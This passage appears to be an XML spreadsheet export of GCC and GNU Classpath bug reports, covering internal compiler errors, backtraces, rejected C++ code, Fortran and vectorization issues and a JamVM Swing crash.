        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:21519
0x7c2fcd gen_member_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20356
0x7c2fcd gen_struct_or_union_type_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20461
0x7c2fcd gen_tagged_type_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20662
0x7c483d gen_type_die_with_usage
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20824
0x7c5516 gen_type_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20879
0x7d3a79 gen_decl_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:21465
0x7d4594 dwarf2out_decl
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:21915
0x7d486b dwarf2out_type_decl
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:21625
0xb187ef rest_of_type_compilation(tree_node* int)
        /mnt/svn/gcc-trunk/gcc/passes.c:336
0x5d4cf3 finish_struct(unsigned int tree_node* tree_node* tree_node* c_struct_parse_info*)
        /mnt/svn/gcc-trunk/gcc/c/c-decl.c:7849
0x611a4e c_parser_struct_or_union_specifier
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:2812
0x611a4e c_parser_declspecs
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:2387
0x60fc2b c_parser_struct_declaration
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:2896
0x6119b7 c_parser_struct_or_union_specifier
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:2786
0x6119b7 c_parser_declspecs
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:2387
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ /mnt/svn/gcc-trunk/binary-latest/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-226486-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-226486-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl --without-isl
Thread model: posix
gcc version 6.0.0 20150803 (experimental) (GCC) 
-freport-bug fails here:
$ /mnt/svn/gcc-trunk/binary-latest/bin/gcc -freport-bug -g -fpack-struct testcase.c      
testcase.c:8:3: error: type variant differs by TYPE_PACKED.
   }
...
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The bug is not reproducible so it is likely a hardware or OS problem.
Is this behavior expected? It reproduces everytime for me.
Tested revisions:
r226486 - ICE
gcc-5-branch r225803 - OK</t>
  </si>
  <si>
    <t>GCC-34212</t>
  </si>
  <si>
    <t>spurious warning: value computed is not used</t>
  </si>
  <si>
    <t>long f( long
template 
struct X
{
        X() : r_()
        {
                B ? f( r_ ) : ++r_
        }
        long r_
}
X h
$ /opt/gcc43/bin/g++ t.cpp -Wall -c
t.cpp: In constructor 'X::X() [with T = int bool B = false]':
t.cpp:11:   instantiated from here
t.cpp:7: warning: value computed is not used
this bug may be related to PR26632.</t>
  </si>
  <si>
    <t>CLASSPATH-25374</t>
  </si>
  <si>
    <t>LogManager-related security bug with netx</t>
  </si>
  <si>
    <t>I don't have a self contained test case for this.
First you must download netx: http://jnlp.sourceforge.net/netx/
Then run:
jamvm -jar ~/netsrc/java/webstart/netx-cvs.jar -jnlp http://irate.sourceforge.net/webstart/stable/irate-client-swt.jnlp
For me this dies with a security-related error:
java.lang.reflect.InvocationTargetException
   at java.lang.reflect.Method.invokeNative (Native Method)
   at java.lang.reflect.Method.invoke (Method.java:355)
   at jamvm.java.lang.JarLauncher.main (JarLauncher.java:50)
Caused by: java.lang.reflect.InvocationTargetException
   at java.lang.reflect.Method.invokeNative (Native Method)
   at java.lang.reflect.Method.invoke (Method.java:355)
   at netx.jnlp.runtime.Boot13.main (Boot13.java:102)
   at java.lang.reflect.Method.invokeNative (Native Method)
   ...2 more
Caused by: java.lang.NoClassDefFoundError: netx/jnlp/services/ServiceUtil$PrivilegedHandler
   at netx.jnlp.services.ServiceUtil.createPrivilegedProxy (ServiceUtil.java:122)
   at netx.jnlp.services.XServiceManagerStub. (XServiceManagerStub.java:51)
   at netx.jnlp.runtime.JNLPRuntime.initialize (JNLPRuntime.java:144)
   at netx.jnlp.runtime.Boot.run (Boot.java:162)
   at java.security.AccessController.doPrivileged (AccessController.java:96)
   at netx.jnlp.runtime.Boot.main (Boot.java:151)
   at java.lang.reflect.Method.invokeNative (Native Method)
   ...5 more
Caused by: java.lang.NoClassDefFoundError: java/lang/reflect/InvocationHandler
   at java.lang.VMClassLoader.defineClass (Native Method)
   at java.lang.ClassLoader.defineClass (ClassLoader.java:472)
   at java.security.SecureClassLoader.defineClass (SecureClassLoader.java:108)
   at java.net.URLClassLoader.findClass (URLClassLoader.java:955)
   at netx.jnlp.runtime.Boot13.loadClass (Boot13.java:72)
   at java.lang.ClassLoader.loadClass (ClassLoader.java:294)
   at netx.jnlp.services.ServiceUtil.createPrivilegedProxy (ServiceUtil.java:122)
   ...11 more
Caused by: java.lang.ExceptionInInitializerError
   at java.util.logging.Logger.getLogger (Logger.java:258)
   at java.util.logging.Logger.getLogger (Logger.java:206)
   at java.util.logging.Logger. (Logger.java:76)
   at gnu.classpath.debug.SystemLogger. (SystemLogger.java:47)
   at gnu.javax.crypto.RSACipherImpl. (RSACipherImpl.java:72)
   at java.lang.VMClass.forName (Native Method)
   at java.lang.Class.forName (Class.java:161)
   at gnu.java.security.provider.Gnu$1.run (Gnu.java:174)
   at java.security.AccessController.doPrivileged (AccessController.java:96)
   at gnu.java.security.provider.Gnu. (Gnu.java:51)
   at java.security.Security. (Security.java:102)
   at java.lang.SecurityManager$1.run (SecurityManager.java:1058)
   at java.security.AccessController.doPrivileged (AccessController.java:96)
   at java.lang.SecurityManager.checkPackageList (SecurityManager.java:1054)
   at java.lang.SecurityManager.checkPackageAccess (SecurityManager.java:923)
   at java.lang.ClassLoader$1.loadClass (ClassLoader.java:1108)
   at java.lang.ClassLoader.loadClass (ClassLoader.java:294)
   at netx.jnlp.runtime.Boot13.loadClass (Boot13.java:75)
   at java.lang.ClassLoader.loadClass (ClassLoader.java:294)
   at java.lang.VMClassLoader.defineClass (Native Method)
   ...17 more
Caused by: java.lang.NullPointerException
   at netx.jnlp.runtime.JNLPSecurityManager.checkPermission (JNLPSecurityManager.java:239)
   at java.util.logging.LogManager.checkAccess (LogManager.java:786)
   at java.util.logging.Logger.setLevel (Logger.java:467)
   at java.util.logging.LogManager. (LogManager.java:147)
   at java.util.logging.LogManager.makeLogManager (LogManager.java:213)
   at java.util.logging.LogManager. (LogManager.java:180)
   at java.util.logging.Logger.getLogger (Logger.java:258)
   ...36 more</t>
  </si>
  <si>
    <t>GCC-55979</t>
  </si>
  <si>
    <t>[C++11] std::list range construction imposes unnecessary conversion constraints</t>
  </si>
  <si>
    <t>The following code provided by Jonathan compiled with gcc 4.8.0 20130113 (experimental) using the flags
-Wall -std=c++11 -pedantic
is rejected:
//-------------------------------
#include 
struct A
{
  A(int) { }
  A(const A
  A
}
int main()
{
  int i[] = {1 2}
  std::list li(i i + 2)
}
//-------------------------------
[..]gcc\include\c++\4.8.0\bits\stl_list.h||In instantiation of 'std::_List_node::_List_node(_Args _Tp = A]':|
[..]\gcc\include\c++\4.8.0\ext\new_allocator.h|120|required from 'void __gnu_cxx::new_allocator::construct(_Up* _Args _Args = {A} _Tp = std::_List_node]'|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|506|required from 'std::list::_Node* std::list::_M_create_node(_Args _Tp = A _Alloc = std::allocator std::list::_Node = std::_List_node]'|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|1558|required from 'void std::list::_M_insert(std::list::iterator _Args _Tp = A _Alloc = std::allocator std::list::iterator = std::_List_iterator]'|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|1022|required from 'void std::list::push_back(std::list::value_type _Alloc = std::allocator std::list::value_type = A]'|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|1491|required from 'void std::list::_M_initialize_dispatch(_InputIterator _InputIterator std::__false_type) [with _InputIterator = int* _Tp = A _Alloc = std::allocator]'|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|628|required from 'std::list::list(_InputIterator _InputIterator const allocator_type  = void _Tp = A _Alloc = std::allocator std::list::allocator_type = std::allocator]'|
main.cpp|13|required from here|
[..]gcc\include\c++\4.8.0\bits\stl_list.h|115|error: use of deleted function 'A::A(const A&amp;)'|
main.cpp|6|error: declared here
The error is due to a call of push_back with an previous int-&gt;A conversion. 
Such an conversion from the iterator's value_type to the containers value_type
is not feasible. The specification of the corresponding constructor is
(indirectly) ruled by Table 100 expression X(i j):
Requires: T shall be EmplaceConstructible into X from *i.
Move/CopyConstructible or Convertible to value_type are not required.
Instead of invoking push_back this constructor should internally invoke the
equivalent of emplace_back.
This issue is similar to bug 55977 involving std::vector but occurs even with the default allocator and for all iterator categories except input iterator therefore this issue is reported separately.</t>
  </si>
  <si>
    <t>CLASSPATH-22835</t>
  </si>
  <si>
    <t>jamvm crash with Swing</t>
  </si>
  <si>
    <t xml:space="preserve">
Recent gtk-peer changes broke swing:
classpath cvs / jamvm 1.2.3 + fixes from jamvm list
GTK 2.4.14-2 from Debian
-----------------------
import javax.swing.JFrame
public class Swing {
    public static void main(String [] args) {
        JFrame f = new JFrame()
        f.show()
    }
}
----------------------
(gdb) bt
#0  0x282c0001 in ?? ()
#1  0xa4fac4b9 in get_state (env=0xaffff56c obj=0xa6fb7828 table=0x8174c18)
    at native_state.c:229
#2  0xa4f9fd27 in connect_awt_hook_cb (widget=0x8288e08 peer=0xa6fb7828)
    at gnu_java_awt_peer_gtk_GtkEvents.c:1138
#3  0xa4b7a121 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#4  0xa4b65c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#5  0xa4b79aa8 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#6  0xa4b78be7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#7  0xa4b78ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#8  0xa4eb6bff in gtk_widget_realize () from /usr/lib/libgtk-x11-2.0.so.0
#9  0xa4ec63ef in gtk_window_reshow_with_initial_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
#10 0xa4b7a121 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#11 0xa4b65fb7 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#12 0xa4b65c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0xa4b79451 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#14 0xa4b78be7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#15 0xa4b78ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0xa4eb63b6 in gtk_widget_show () from /usr/lib/libgtk-x11-2.0.so.0
#17 0xa4fa77c2 in Java_gnu_java_awt_peer_gtk_GtkWindowPeer_nativeSetVisible (
    env=0xa6fb7828 obj=0xa6fb7828 visible=1 '_x0000_01')
    at gnu_java_awt_peer_gtk_GtkWindowPeer.c:229
#18 0x0805c659 in callJNIMethod (env=0xaffff78c class=0x0
    sig=0x806b888 (Z)V ret_type=2 ostack=0x80861fc
    f=0xa4fa7760 U211uffff203uffff_x0000_30_x0000_17uffffE_x0000_20211]uffffuffffnuffffuffffuffff201uffffb212 args=2)
    at dll_md.c:64
#19 0x0804e154 in callJNIWrapper (class=0x0 mb=0x81b0fc4 ostack=0xa6fb7828)
    at dll.c:301
#20 0x0805257e in executeJava () at interp.c:1986
#21 0x0804ebe2 in executeMethodVaList (ob=0x0 class=0xa6fb7828 mb=0x8126668
    jargs=0xaffff950 _x0000_34uffffuffffuffff_x0000_01) at execute.c:66
#22 0x0804ea76 in executeMethodArgs (ob=0xa6fb7828 class=0xa6fb7828
    mb=0xa6fb7828) at execute.c:38
#23 0x08052fc2 in main (argc=2 argv=0xaffff9f4) at jam.c:303
</t>
  </si>
  <si>
    <t>GCC-59</t>
  </si>
  <si>
    <t>deducing non-type template parameters</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Thu 30 Dec 1999 18:23:40 +0200
 Original-Message-ID: 
 Compiling the following code with gcc-2.95.2 gives the error:
 test1.cc: In function `int main()':
 test1.cc:32: no match for `ostream &amp;  &amp;'
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/iostream.h:77:
 candidates are: class ostream &amp; ostream::operator &lt;&lt;(char)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/iostream.h:78:                
 class ostream &amp; ostream::operator &lt;&lt;(unsigned char)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/iostream.h:79:                
 class ostream &amp; ostream::operator &lt;&lt;(signed char)
 etc. etc. etc.
 The code is:
 #include 
 template
 class R
 {
   public:
     R() { value = lower }
     T val() const { return value }
   private:
     T value
 }
 template
 ostream&amp;
 operator&amp; the_value)
 {
   return out_stream &lt;&lt; the_value.val()
 } 
 int main()
 {
   R f
   cout &lt;&lt; endl
   cout &lt;&lt; Number is:  &lt;&lt; f &lt;&lt; endl
   return 0
 }
 If the class is defined slightly differently and all references
 to it are altered accordingly all is OK:
 template is replaced with:
 template
 Of course this will be no good in a real example as the class
 needs to be able to specify the other template parameters in
 terms of T and not in terms of int!
 I seem to recall that is worked with some earlier version of g++
 Michael Ben-Gershon
 mybg@netvision.net.il
Release:
2.95.2
How-To-Repeat:
This is the same problem as 79</t>
  </si>
  <si>
    <t>CLASSPATH-23007</t>
  </si>
  <si>
    <t>JInternalFrame title bar to low</t>
  </si>
  <si>
    <t>The title bar of a JInternal frame is draw a little down and to thee right of the top of the frame. An example is the screenshot from the GNU Classpath Examples Desktop World.
jamvm -Dswing.defaultlaf=javax.swing.plaf.metal.MetalLookAndFeel -cp /usr/local/classpath/share/classpath/examples/examples.zip gnu.classpath.examples.swing.Demo</t>
  </si>
  <si>
    <t>GCC-19925</t>
  </si>
  <si>
    <t>Implied do-loop in an initialization expression is broken</t>
  </si>
  <si>
    <t>From Richard Maine editor of the F2003 standard
   program stuff
     integer :: i_do
     integer :: i(101) = (/ (i_do i_do=1101) /)
     write (**) i
   end program stuff
   bug1.f90: In function 'MAIN__':
   bug1.f90:4: internal compiler error: Possible frontend bug: array 
   constructor not expanded
   Note that it works up to size 100 fails at size 101.
If we look in array.c we find the magic number 100.
/* This parameter is the size of the largest array constructor that we
   will expand to an array constructor without iterators.
   Constructors larger than this will remain in the iterator form.  */
#define GFC_MAX_AC_EXPAND 100</t>
  </si>
  <si>
    <t>GCC-2088</t>
  </si>
  <si>
    <t>Bootstrap 3.0 on i686-linux fails again.</t>
  </si>
  <si>
    <t>After Richards latest patch the bootstrap still fails
but now somewhere else:
./xgcc -B./ -B/usr/local/gcc-3.0/i686-pc-linux-gnu/bin/ -isystem /usr/local/gcc-3.0/i686-pc-linux-gnu/include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/usr/src/gcc/gcc-cvs-3.0/gcc -I/usr/src/gcc/gcc-cvs-3.0/gcc/. -I/usr/src/gcc/gcc-cvs-3.0/gcc/config -I/usr/src/gcc/gcc-cvs-3.0/gcc/../include  -fexceptions -DL_eh -c /usr/src/gcc/gcc-cvs-3.0/gcc/libgcc2.c -o libgcc/./_eh.o
/usr/src/gcc/gcc-cvs-3.0/gcc/libgcc2.c: In function `eh_context_static':
/usr/src/gcc/gcc-cvs-3.0/gcc/libgcc2.c:3335: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_eh.o] Error 1
make[3]: Leaving directory `/usr/src/gcc/gcc-objdir-3.0/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/usr/src/gcc/gcc-objdir-3.0/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/usr/src/gcc/gcc-objdir-3.0/gcc'
make: *** [bootstrap] Error 2
gcc_build: error: Could not bootstrap the compiler
Release:
gcc version 3.0 20010225 (current cvs version of 3.0 branch).
Environment:
i686-*-linux with gcc-3.0 20010224 as default compiler.
How-To-Repeat:
/usr/src/gcc/gcc-objdir-3.0/gcc&gt;./cc1 -fpreprocessed libgcc2.i -quiet -dumpbase libgcc2.c -g1 -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -version -fPIC -fexceptions -o libgcc2.s
GNU CPP version 3.0 20010225 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C version 3.0 20010225 (prerelease) (i686-pc-linux-gnu)
        compiled by GNU C version 3.0 20010224 (prerelease).
/usr/src/gcc/gcc-cvs-3.0/gcc/libgcc2.c: In function `eh_context_static':
/usr/src/gcc/gcc-cvs-3.0/gcc/libgcc2.c:3335: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
libgcc2.i is attached.
gdb session:
Program received signal SIGSEGV Segmentation fault.
0x81851df in end_sequence () at /usr/src/gcc/gcc-cvs-3.0/gcc/emit-rtl.c:3643
3643      first_insn = tem-&gt;first
(gdb) bt
#0  0x81851df in end_sequence () at /usr/src/gcc/gcc-cvs-3.0/gcc/emit-rtl.c:3643
#1  0x8107b1f in expand_end_stmt_expr (t=0x40304400)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/stmt.c:2161
#2  0x808fd0c in c_expand_expr (exp=0x4030294c target=0x40185200 tmode=VOIDmode
    modifier=EXPAND_NORMAL) at /usr/src/gcc/gcc-cvs-3.0/gcc/c-common.c:4064
#3  0x81356d2 in expand_expr (exp=0x4030294c target=0x0 tmode=VOIDmode
    modifier=EXPAND_NORMAL) at /usr/src/gcc/gcc-cvs-3.0/gcc/expr.c:8712
#4  0x8107067 in expand_expr_stmt (exp=0x4030294c)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/stmt.c:1944
#5  0x8096da7 in genrtl_expr_stmt (expr=0x4030294c)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:386
#6  0x80989f6 in expand_stmt (t=0x40302a8c)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:790
#7  0x80986de in genrtl_compound_stmt (t=0x402f6974)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:713
#8  0x8098a71 in expand_stmt (t=0x402f6974)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:814
#9  0x809726e in genrtl_if_stmt (t=0x402ff040)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:448
#10 0x8098a5e in expand_stmt (t=0x402ff040)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:810
#11 0x80986de in genrtl_compound_stmt (t=0x402f671c)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:713
#12 0x8098a71 in expand_stmt (t=0x402f671c)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-semantics.c:814
#13 0x806aff2 in c_expand_body (fndecl=0x402ee478 nested_p=0)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/c-decl.c:6720
#14 0x806ada8 in finish_function (nested=0) at /usr/src/gcc/gcc-cvs-3.0/gcc/c-decl.c:6664
#15 0x804a62c in yyparse_1 () at /usr/lib/bison.simple:323
#16 0x8051f1d in yyparse () at /usr/src/gcc/gcc-cvs-3.0/gcc/c-lex.c:158
#17 0x80af533 in compile_file (name=0x843d669 libgcc2.i)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/toplev.c:2377
#18 0x80b3f11 in main (argc=18 argv=0xbffff5dc)
    at /usr/src/gcc/gcc-cvs-3.0/gcc/toplev.c:4900
#19 0x4003da2c in __libc_start_main (main=0x80b3690  argc=18 ubp_av=0xbffff5dc
    init=0x80491bc  fini=0x834144c  rtld_fini=0x4000d3c8 
    stack_end=0xbffff5d4) at ../sysdeps/generic/libc-start.c:111
(gdb) p tem
$1 = (struct sequence_stack *) 0x0</t>
  </si>
  <si>
    <t>GCC-68482</t>
  </si>
  <si>
    <t>No vectorization for x86-64</t>
  </si>
  <si>
    <t>GCC ver: 5.2.0 and 4.9.2
Arch: x86-64
Options: -S -O2 -ftree-vectorize -msse2
Code:
#include 
void test(int32_t* input int32_t* out unsigned x1 unsigned x2)
{
	unsigned i j
	unsigned end = x1
	for(i = j = 0 i &lt; 1000 i++) {
		int32_t sum = 0
		end += x2
		for(  j &lt; end j++)
			sum += input[j]
		out[i] = sum
	}
}
GCC is able to vectorize the loop for IA32 arch but not x86-64.
The innermost loop for IA32:
L4:
	movdqu	(%ecx) %xmm1
	addl	$1 %ebx
	addl	$16 %ecx
	cmpl	%ebx 4(%esp)
	paddd	%xmm1 %xmm0
	ja	L4
The innermost loop for x86-64:
.L3:
	movl	%eax %r10d
	addl	$1 %eax
	addl	(%rcx%r104) %edx
	cmpl	%eax %r8d
	jne	.L3</t>
  </si>
  <si>
    <t>lvqcl.mail</t>
  </si>
  <si>
    <t>GCC-20293</t>
  </si>
  <si>
    <t>[4.0 regression] Wrong diagnostic for ambiguous access</t>
  </si>
  <si>
    <t>In:
namespace hide {
    int k
    }
namespace {
    int i
    namespace hide {
        int j
        }
    }
void F(int) {}
int main() {
    F(i)
    F(hide::j)
    }
you get:
~/ootbc/members/src$ g++ foo.cc
foo.cc: In function `int main()':
foo.cc:16: error: `hide' has not been declared
foo.cc:16: error: `j' undeclared (first use this function)
foo.cc:16: error: (Each undeclared identifier is reported only once for each
function it appears in.)
i.e. the lookup for hide fails whereas a simple variable i is found.
My (probably erroneous) understanding is that the anonymous namespace has no 
impact on name scope exports all names declared within it to filescope and 
simply replaces the old static to prevent cluttering the linker namespace. 
That seems to be the case with i. However if that rule were applied to hide 
then the two hides would be at the same level and would merge as namespaces 
do rather than the inner one being hidden as happened. This problem arose 
because I was trying to declare a filescope name (j) in a way that *neither* 
cluttered the compiler's space nor the linkers. 
If this is in fact an error please change this report to a complaint about the 
diagnostic.
Ivan</t>
  </si>
  <si>
    <t>GCC-34083</t>
  </si>
  <si>
    <t>internal compiler error: in gfc_conv_array_constructor_expr at fortran/trans-expr.c:2819</t>
  </si>
  <si>
    <t>While looking at pr34080 I produced the following invalid code
module TransferBug
   type ByteType
      character(len=1)                                  :: singleByte
   end type
end module
program main
   use TransferBug
   type (ByteType)                                   :: bytes(4)
   print * size(bytes)
   bytes = ByteType((/'H' 'i' '!' ' '/))  ! &lt;-- ICE
!   bytes = (/ByteType('H') ByteType('i') ByteType('!') ByteType(' ')/) ! &lt;-- works
end program
which gives an ICE:
pr34080_ice.f90: In function 'MAIN__':
pr34080_ice.f90:12: internal compiler error: in gfc_conv_array_constructor_expr at fortran/trans-expr.c:2819</t>
  </si>
  <si>
    <t>GCC-45053</t>
  </si>
  <si>
    <t>libgcc_s link command misses crtsavgpr_s and crtresgpr_s for powerpc</t>
  </si>
  <si>
    <t xml:space="preserve">
	[I know this is a duplicate of 43810 but the information there is
	partly misleading so I decided to file a new report.]
	If GCC is configured for powerpc with --enable-target-optspace
	libgcc_s objects get compiled with -Os and this causes libgcc_s
	to contain undefined symbols _savegpr_* and _restgpr_*.
	This is probably due to this commit:
	http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=151729
	(The use of those symbols might also depend on --with-float=soft
	I didn't test with a different float option.)
	Those symbols _savegpr_* and _restgpr_* are defined in
	crtsavgpr_s.o and crtresgpr_s.o respectively.  But those objects
	are not linked into libgcc_s.
	The problem also occurs with gcc-4.5.1-RC-20100722 and with
	gcc-4.4.4 if the patch for pr41175 is applied.
Environment:
System: Linux sonnet 2.6.24-28-generic #1 SMP Fri Jun 18 14:18:04 UTC 2010 x86_64 GNU/Linux
host: x86_64-unknown-linux-gnu
build: x86_64-unknown-linux-gnu
target: powerpc-none-linux-gnu
configured with: /work2/build/cross-own/src/gcc-4.5.0/configure --target=powerpc-none-linux-gnu --prefix=/work2/build/cross-own/ppc-own-tmp --disable-threads --disable-nls --disable-multilib --disable-libgomp --disable-libssp --disable-libmudflap --enable-decimal-float=no --disable-libssp --enable-shared --enable-languages=c --enable-checking=yes --enable-symvers=gnu --enable-target-optspace --with-float=soft --with-local-prefix=/work2/build/cross-own/ppc-own/sys-root --with-build-sysroot=/work2/build/cross-own/ppc-own/sys-root --with-sysroot=/work2/build/cross-own/ppc-own/sys-root
How-To-Repeat:
	configure for powerpc and --enable-target-optspace (and possibly --with-float=soft)</t>
  </si>
  <si>
    <t>GCC-29439</t>
  </si>
  <si>
    <t>[4.2 regression]  ICE in fold-const.c:1385 with -O1 -fwrapv -ftree-vrp</t>
  </si>
  <si>
    <t>after closing the PR28230 the bootstrap ICEs on ada.
(...)
/home/users/pluto/rpm/BUILD/trunk/builddir/./gcc/xgcc -B/home/users/pluto/rpm/BUILD/trunk/builddir/./gcc/ -B/usr/x86_64-pld-linux/bin/ -B/usr/x86_64-pld-linux/lib/ -isystem /usr/x86_64-pld-linux/include -isystem /usr/x86_64-pld-linux/sys-include -c -O2 -fwrapv -march=x86-64 -gdwarf-2 -g2  -fPIC      -W -Wall -gnatpg  a-stwifi.adb -o a-stwifi.o
+===========================GNAT BUG DETECTED==============================+
| 4.2.0 20061012 (experimental) (PLD-Linux) (x86_64-pld-linux-gnu) GCC error:|
| tree check: expected integer_cst have var_decl in int_const_binop      |
|    at fold-const.c:1385                                                  |
| Error detected at a-stwifi.adb:677:1</t>
  </si>
  <si>
    <t>GCC-61299</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] Performance regression for the SIMD rotate operation with GCC vector extensions</t>
  </si>
  <si>
    <t>A small test:
/**************/
typedef unsigned int uint32x4 __attribute__ ((vector_size(16)))
typedef struct { uint32x4 a b } prng_t
void foo(prng_t *x)
{
        x-&gt;a ^= ((x-&gt;b b &gt;&gt; (32 - 17)))
}
/**************/
Gets compiled into the following slow code with GCC 4.9 (CFLAGS=-O3):
0000000000000000 :
   0:   66 0f 6f 47 10          movdqa 0x10(%rdi)%xmm0
   5:   66 0f 70 c8 55          pshufd $0x55%xmm0%xmm1
   a:   66 0f 7e c0             movd   %xmm0%eax
   e:   c1 c8 0f                ror    $0xf%eax
  11:   89 44 24 e8             mov    %eax-0x18(%rsp)
  15:   66 0f 7e c8             movd   %xmm1%eax
  19:   66 0f 6f c8             movdqa %xmm0%xmm1
  1d:   c1 c8 0f                ror    $0xf%eax
  20:   66 0f 6a c8             punpckhdq %xmm0%xmm1
  24:   89 44 24 ec             mov    %eax-0x14(%rsp)
  28:   66 0f 70 c0 ff          pshufd $0xff%xmm0%xmm0
  2d:   66 0f 6e 5c 24 ec       movd   -0x14(%rsp)%xmm3
  33:   66 0f 7e c8             movd   %xmm1%eax
  37:   c1 c8 0f                ror    $0xf%eax
  3a:   89 44 24 f0             mov    %eax-0x10(%rsp)
  3e:   66 0f 7e c0             movd   %xmm0%eax
  42:   66 0f 6e 44 24 e8       movd   -0x18(%rsp)%xmm0
  48:   66 0f 6e 4c 24 f0       movd   -0x10(%rsp)%xmm1
  4e:   c1 c8 0f                ror    $0xf%eax
  51:   66 0f 62 c3             punpckldq %xmm3%xmm0
  55:   89 44 24 f4             mov    %eax-0xc(%rsp)
  59:   66 0f 6e 54 24 f4       movd   -0xc(%rsp)%xmm2
  5f:   66 0f 62 ca             punpckldq %xmm2%xmm1
  63:   66 0f 6c c1             punpcklqdq %xmm1%xmm0
  67:   66 0f ef 07             pxor   (%rdi)%xmm0
  6b:   0f 29 07                movaps %xmm0(%rdi)
  6e:   c3                      retq   
It used to be a lot better with GCC 4.8 (CFLAGS=-O3):
0000000000000000 :
   0:   66 0f 6f 4f 10          movdqa 0x10(%rdi)%xmm1
   5:   66 0f 6f c1             movdqa %xmm1%xmm0
   9:   66 0f 72 d1 0f          psrld  $0xf%xmm1
   e:   66 0f 72 f0 11          pslld  $0x11%xmm0
  13:   66 0f ef c1             pxor   %xmm1%xmm0
  17:   66 0f ef 07             pxor   (%rdi)%xmm0
  1b:   66 0f 7f 07             movdqa %xmm0(%rdi)
  1f:   c3                      retq</t>
  </si>
  <si>
    <t>GCC-59142</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] internal compiler error while compiling OpenCV 2.4.7</t>
  </si>
  <si>
    <t>This is on an ARM platform with Ubuntu/Linaro 13.10.
While building OpenCV 2.4.7 with:
  cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/home/jm/fidelio/3rd-party/opencv/2.4.7/linaro ..
  make
I got:
[ 71%] Building CXX object modules/ocl/CMakeFiles/opencv_ocl.dir/src/imgproc.cpp.o
/home/jm/fidelio/3rd-party/opencv/2.4.7/opencv-2.4.7/modules/ocl/src/imgproc.cpp: In function â€˜void cv::ocl::copyMakeBorder(const cv::ocl::oclMat&amp; cv::ocl::oclMat&amp; int int int int int const Scalar&amp;)â€™:
/home/jm/fidelio/3rd-party/opencv/2.4.7/opencv-2.4.7/modules/ocl/src/imgproc.cpp:513:9: internal compiler error: output_operand: invalid expression as operand
         }
         ^
Please submit a full bug report
